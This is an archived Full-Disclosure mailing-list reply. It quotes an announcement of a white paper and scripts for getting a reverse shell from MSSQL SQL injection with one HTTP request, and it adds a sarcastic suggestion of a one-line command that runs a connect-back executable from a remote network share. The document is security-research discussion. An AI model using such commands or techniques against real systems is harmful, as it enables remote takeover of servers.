Re: [Full-disclosure] One Click Ownage [White Paper and Scripts]
- From: Fredrick Diggle <fdiggle@xxxxxxxxx>
- Date: Sun, 5 Jul 2009 23:22:22 -0500
Or just
'start \\DiggleSec.com\fredrick\connectback.exe'
would have also been acceptable.
But Fredrick is sure that your 20 page write-up was fantastically entertaining.
On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh@xxxxxxxxxxxx> wrote:
This is a different and more practical approach to get a reverse shell
or code execution in SQL Injections (particularly in MSSQL). The idea
is simple. Getting a reverse shell from an SQL Injection with one HTTP
request without using an extra channel such as TFTP, FTP to upload the
initial payload.
White paper explains the steps and the details of the attack. Scripts
got all the tools you need to create your HTTP request with your own
payload.
White Paper:
http://ferruh.mavituna.com/papers/oneclickownage.pdf
Scripts:
http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
Presentation (IT Underground 2009):
http://www.slideshare.net/fmavituna/one-click-ownage-1660539
Regards,
--
http://ferruh.mavituna.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Follow-Ups:
- References:
- [Full-disclosure] One Click Ownage [White Paper and Scripts]
- From: Ferruh Mavituna
- [Full-disclosure] One Click Ownage [White Paper and Scripts]
- Prev by Date: [Full-disclosure] Some small 0day...
- Next by Date: [Full-disclosure] Pwning Nokia phones (and other Symbian based smartphones)
- Previous by thread: [Full-disclosure] One Click Ownage [White Paper and Scripts]
- Next by thread: Re: [Full-disclosure] One Click Ownage [White Paper and Scripts]
- Index(es):
Relevant Pages
|
